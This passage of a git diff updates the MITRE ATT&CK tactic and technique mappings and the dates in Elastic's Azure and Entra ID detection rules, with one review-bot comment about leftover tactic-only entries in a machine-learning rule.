@@ -2,7 +2,7 @@ creation_date = "2025/07/02" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,22 +80,39 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name"] diff --git a/rules/integrations/azure/initial_access_entra_id_user_reported_risk.toml b/rules/integrations/azure/initial_access_entra_id_user_reported_risk.toml index 4af77d21fd9..ffd21e01236 100644 --- a/rules/integrations/azure/initial_access_entra_id_user_reported_risk.toml +++ b/rules/integrations/azure/initial_access_entra_id_user_reported_risk.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/21" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Willem D'Haese"] 
@@ -80,18 +80,31 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1621" +name = "Multi-Factor Authentication Request Generation" +reference = "https://attack.mitre.org/techniques/T1621/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml index 53b7a160471..030a4b2202d 100644 --- a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml +++ b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -114,34 +114,52 @@ event.dataset: "azure.graphactivitylogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/ml_azure_rare_event_failures.toml b/rules/integrations/azure/ml_azure_rare_event_failures.toml index 9e1182f57d9..98a52ccc75f 100644 --- a/rules/integrations/azure/ml_azure_rare_event_failures.toml +++ b/rules/integrations/azure/ml_azure_rare_event_failures.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
@@ -91,11 +91,6 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat.technique]] id = "T1526" name = "Cloud Service Discovery" @@ -106,9 +101,34 @@ id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" @@ -117,14 +137,6 @@ reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" @@ -133,16 +145,7 @@ reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - 
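Review bot: The Lateral Movement (TA0008) and Collection (TA0009) entries are left as tactic-only `[[rule.threat]]` tables with no technique, while the same change attaches T1078.004 and T1098.003 to the Privilege Escalation entry and deletes the technique-less Defense Evasion and Persistence entries. That leaves the two remaining bare entries looking like leftovers rather than deliberate mappings. Either attach a technique (the sibling ml_azure_rare_method_by_user rule in this change maps T1021.007 Cloud Services under Lateral Movement, which may fit here as well, though I cannot confirm it from the rule body) or remove them the way the TA0005 and TA0003 entries were removed. The Discovery entry's reorder (techniques before `[rule.threat.tactic]`) matches the other files and reads fine.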
diff --git a/rules/integrations/azure/ml_azure_rare_method_by_city.toml b/rules/integrations/azure/ml_azure_rare_method_by_city.toml index 84f94ffc52b..cba37cb9c9f 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_city.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_city.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -93,11 +93,42 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -107,3 +138,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/integrations/azure/ml_azure_rare_method_by_country.toml b/rules/integrations/azure/ml_azure_rare_method_by_country.toml index bbaf6442692..8ab7ffc6687 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_country.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -92,11 +92,24 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -106,3 +119,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/ml_azure_rare_method_by_user.toml b/rules/integrations/azure/ml_azure_rare_method_by_user.toml index 2dd9dacbf77..71251715303 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_user.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_user.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -91,11 +91,6 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -106,14 +101,14 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" @@ -124,9 +119,24 @@ id = "T1021.007" name = "Cloud Services" reference = "https://attack.mitre.org/techniques/T1021/007/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" 
@@ -135,13 +145,30 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml index 222286c88de..a349b7481c8 100644 --- a/rules/integrations/azure/persistence_automation_account_created.toml +++ b/rules/integrations/azure/persistence_automation_account_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -73,26 +73,31 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1651" +name = "Cloud Administration Command" +reference = "https://attack.mitre.org/techniques/T1651/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/azure/persistence_entra_id_application_credential_modification.toml b/rules/integrations/azure/persistence_entra_id_application_credential_modification.toml index 4d0f2369673..f52e088dc52 100644 --- a/rules/integrations/azure/persistence_entra_id_application_credential_modification.toml +++ b/rules/integrations/azure/persistence_entra_id_application_credential_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -87,18 +87,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update applica [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml index a89c1fcdf5d..c4d989ec39c 100644 --- a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,6 +92,7 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" 
@@ -102,12 +103,28 @@ id = "T1556.009" name = "Conditional Access Policies" reference = "https://attack.mitre.org/techniques/T1556/009/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"] diff --git a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml index 94d21dfa04f..29ec1157ee0 100644 --- a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml +++ b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/06" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,19 +83,36 @@ event.dataset:azure.auditlogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml index 5729fb8abc7..399321fc3c5 100644 --- a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml +++ b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -86,19 +86,54 @@ event.dataset: "azure.auditlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml index 67622baed76..ac59e69abe3 100644 --- a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml +++ b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/09/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,18 +84,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManage [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml index 421b38cec2b..58d2f4e9d7c 100644 --- a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -85,30 +85,49 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update role se [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml index b1eac4dbf32..ec43155f239 100644 --- a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml +++ b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -110,43 +110,45 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -155,3 +157,20 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml index 39ea903de00..d294fd52148 100644 --- a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml 
+++ b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -81,6 +81,7 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -91,13 +92,28 @@ id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml index fd409ec66bb..01c3be3815b 100644 --- a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "Changes in ECS added cloud.* fields which are not available prior to ^9.2.0" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -91,36 +91,54 @@ from logs-azure.auditlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_entra_id_suspicious_adrs_token_request.toml b/rules/integrations/azure/persistence_entra_id_suspicious_adrs_token_request.toml index b1f8591e4cc..b61fccee5f3 100644 --- a/rules/integrations/azure/persistence_entra_id_suspicious_adrs_token_request.toml +++ b/rules/integrations/azure/persistence_entra_id_suspicious_adrs_token_request.toml 
